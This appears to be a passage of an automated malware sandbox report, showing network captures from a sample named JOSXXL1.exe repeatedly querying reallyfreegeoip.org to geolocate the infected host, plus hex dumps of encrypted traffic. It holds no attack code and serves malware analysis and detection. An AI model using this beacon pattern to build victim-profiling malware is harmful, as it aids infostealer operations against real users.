                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: 88 22 ce 70 1b 54 e0 7f 2e 4a 2c c2 90 51 93 dd 00 22 f0 93 71 dc 5d 21 d8 29 96 66 d2 29 d2 06 bf 73 ec b9 1d 96 c9 87 62 06 66 8a a1 77 39 99 2a d6 65 92 ed cb 46 10 b3 55 58 83 e0 0d 62 06 81 a6 6f 41 8c b4 14 df 41 89 20 ce 3a a6 fc 3b 25 8b 58 75 08 96 ed 48 5e c3 90 ac 9a 11 d8 56 40 1e 1f 07 dc b6 26 79 d9 32 d3 c8 9a 36 a1 b5 d5 ee 5c a1 b2 dc 96 a2 f7 01 84 b4 a7 52 db 10 ed 6b e7 cc a7 85 44 06 85 3c 47 23 4b 70 c3 f0 b0 5b 9e d4 c9 b3 10 1e 31 9c cb 6b e7 7f 83 be 98 1b df 24 4d ed 79 e6 10 bc 24 fb 9f 03 8e 98 bc 7c f7 0c 47 7e 2f a4 80 1a 6d 01 ea f9 9a fd 54 e4 5f 5a 58 52 61 20 55 30 b4 ed d6 c2 60 3a 3a dc 40 41 4d f5 c6 38 b8 2e 34 c4 7a 55 59 4d 9e f6 0f 3f 7a e7 05 66 66 19 7d fc 64 9c 36 fc 87 d5 d5 12 38 f3 63 90 80 6a bd f9 2b ff d6
                                                                                                      Data Ascii: "pT.J,Q"q]!)f)sbfw9*eFUXboAA :;%XuH^V@&y26\RkD<G#Kp[1k$My$|G~/mT_ZXRa U0`::@AM8.4zUYM?zff}d68cj+
                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: 9d a7 8b e5 9c 6d ad bd ce b7 83 50 b2 75 af f1 bf 4f fd 49 96 cf f2 44 54 a0 61 68 89 17 9f 75 7b f4 50 ca df e9 6b 4a 3f 4b 6e e8 e0 c9 19 55 55 5b df 92 39 3a 51 f7 ff 07 e6 88 8f 0e de 6e 16 a4 4a 27 92 93 a2 dd c0 a2 53 e9 80 9a a6 43 8e dc 49 c2 e7 2a cf 95 e3 32 d2 83 6b 92 65 4f cd 34 53 33 5e e0 16 62 4e c4 76 b3 7b a7 0f 85 e2 2a c4 f4 8b 2b 26 c3 77 6a 7c 46 b7 6d 97 7d c9 b9 9e cc 5f 96 0f e1 85 33 28 07 fb 65 a8 c1 3b 59 2f 42 bf 6a 09 38 66 d5 1e 09 2e ca f3 e6 28 d6 99 28 23 9a 6d c1 5d c7 68 96 75 c2 9b e6 1e 7c 1b 97 a6 d3 ee 06 38 d8 3a da e4 7e eb 39 99 ca ad e1 dd 0a d2 83 90 b7 25 87 2b 88 26 bb 8a a6 54 90 63 0b c2 24 d4 92 c9 04 b3 4d 07 e1 bc 5d 89 2f 06 98 29 9c 67 29 33 a0 26 85 74 95 74 39 81 e1 39 62 da b2 3b a1 47 7f cc 25 dc
                                                                                                      Data Ascii: mPuOIDTahu{PkJ?KnUU[9:QnJ'SCI*2keO4S3^bNv{*+&wj|Fm}_3(e;Y/Bj8f.((#m]hu|8:~9%+&Tc$M]/)g)3&tt99b;G%
                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: 1b 07 31 6f 12 44 5d e7 75 cc dc 0c bd 94 bf 6e dd b9 66 d2 89 39 ab ac 72 b1 9b e8 f4 b9 c1 49 b1 ca 2c 5b 4f ca 38 2e ab 41 f1 8e 4e 2c 38 93 2e 53 89 67 33 38 f8 00 52 12 a2 b9 95 12 3f bf 9d 32 e4 87 d1 29 6e 59 b6 72 e3 96 06 1f a5 97 02 14 09 8e 5a 0b 1a d7 9b 29 b6 73 22 1f 28 5a 9c 37 29 e7 8d ba 5e 33 2f 9b 66 cc d3 3e fd 93 09 6b 8c 16 53 1d 46 f9 37 0c d8 99 5d 4e 99 f6 e3 80 3b 8c 2e 4b e3 d8 d7 bf 49 1d 7c 97 23 a2 45 0b 1d 04 b9 91 2d 1f 11 66 b7 f2 a5 d3 f7 3a 43 0d f7 35 c0 01 eb 2a b9 67 94 6a 6e 01 1e 18 0c 83 2f 51 a8 37 3d 28 43 e3 26 5e c8 15 70 b1 eb 0a 24 cb c8 b4 77 de c9 7b 51 18 4a 96 2a bb 47 b9 7b a0 1f bc 9e 9f f2 e7 cf f8 b3 98 fb 8d eb b9 74 a9 64 26 f5 6a ca dc af c8 5d 06 cc 20 68 fe 50 30 70 4d 7a 69 4a b5 77 4e 7b 3d 7b
                                                                                                      Data Ascii: 1oD]unf9rI,[O8.AN,8.Sg38R?2)nYrZ)s"(Z7)^3/f>kSF7]N;.KI|#E-f:C5*gjn/Q7=(C&^p$w{QJ*G{td&j] hP0pMziJwN{={


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.461896188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:19 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-26 21:57:20 UTC881INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: MISS
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQpqfqPOZ5gLAtm%2F0P6KIOAAo7wJUYQS2nSgEUOqeysHJaUByCmypxmR%2BvqM9nUEpZo95bXpsuPW8GNUikkz5MTEAB25sEX6WGX5Dxr22o41WJ0Ukvhcrc4jPynoQ9t3vC5yBGNP"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db38d69946bae-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2462585&cwnd=251&unsent_bytes=0&cid=05e91c15d89abf28&ts=462&x=0"
                                                                                                      2024-10-26 21:57:20 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.461902188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:20 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-26 21:57:21 UTC894INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:21 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 2
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BuAGPRwN1ik%2BEoLXmjWp4mpJUTEcNRXiSJ%2FOhIfLtoGRSc1Tn59SZ4YO2ZleNcKsga%2FhNoCNjrQU2kRTOiYdGbfX4FazO2VCvLDGXjEqBXk2vLYzzJPu3g%2FxnNWF6e1VB81G9mx"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3969e373abb-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2371826&cwnd=251&unsent_bytes=0&cid=e5e19ee2bfed5da7&ts=191&x=0"
                                                                                                      2024-10-26 21:57:21 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.461913188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:22 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-26 21:57:22 UTC890INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:22 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 3
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHiisrZQgVARELdXGDRT1odpP9K7Ufl%2FjLrHU0pgXUYZSwCeBl%2Ft0qvciXYORTuCBJyTkKj%2B5UagQZw7camOSGHB6PjgcfSqGsyZX2r4ZUj0LB5UJw7OJsrbYxJi8MW4UvRl9w7N"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db39fea376bc6-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2468883&cwnd=241&unsent_bytes=0&cid=c2930f4a9242bc32&ts=155&x=0"
                                                                                                      2024-10-26 21:57:22 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.461922188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:23 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-26 21:57:24 UTC890INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:24 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 5
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BUgV2WSq7XTq9Ru1FId0JZsooAkYxt4gywAkVWlzX3lVFWdTZ8WoRuUSbAJnTxk9%2FWvABPXYm1PUQ%2BTMnO7ALPocyBvIBHjorydTlcduwyrXbA6zGFsWk5f1Oa9UAVuyk3E2Yqlu"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3a94ff46b52-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2686456&cwnd=223&unsent_bytes=0&cid=a24417429bdf0590&ts=204&x=0"
                                                                                                      2024-10-26 21:57:24 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.461933188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:25 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-26 21:57:25 UTC892INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:25 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 6
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZmY%2Fq3phhfLd3iEX%2FQ3VRW3z56U9%2BIaw93HSscBP%2Fwp3PGtnt6iaKw79WSvteVMeMigPnskuhh1bzpo7eDxtQ1nsqvd2BukQVVPq5gAzu8dKkUGtYyFKUn7bFAMBZkD9AUVpocX"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3b32bfe474a-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1802&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1462626&cwnd=251&unsent_bytes=0&cid=7dcee111638c095a&ts=160&x=0"
                                                                                                      2024-10-26 21:57:25 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.461945188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:26 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-26 21:57:27 UTC888INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:27 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 8
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYZJ49z40VGCFyOs1bCoittTzoZC1BYyzyIoyugcueW%2B0xEKgLtHZl8doa1zBGdYhWRntpmdU7WDcYfbi1ehDqBYtRMukztaH5moB8GgotpJ0HEBggbmUQ82ZEzNyoB49HUJtMZr"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3bc2f9e474e-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2354471&cwnd=244&unsent_bytes=0&cid=3882930602556f0c&ts=163&x=0"
                                                                                                      2024-10-26 21:57:27 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.461952188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:28 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-26 21:57:28 UTC888INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:28 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 9
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DsCNgvJwwU2YVGEwjqCkS1kOTAIX4o3pbzRynTRS2cxYoHDZCrVDhfJstUvI5ZV9aoLFNq%2Fn0Olq0i6tDOFxOPfeBk%2F3JXjDGFOUpaOrDIQpEX2NxywMKuA4vMHAlZx6lcw3FhJs"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3c569e7476e-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1051&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2535901&cwnd=246&unsent_bytes=0&cid=2fbd20df5cde2216&ts=166&x=0"
                                                                                                      2024-10-26 21:57:28 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.461964188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:29 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-26 21:57:30 UTC895INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:30 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 11
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
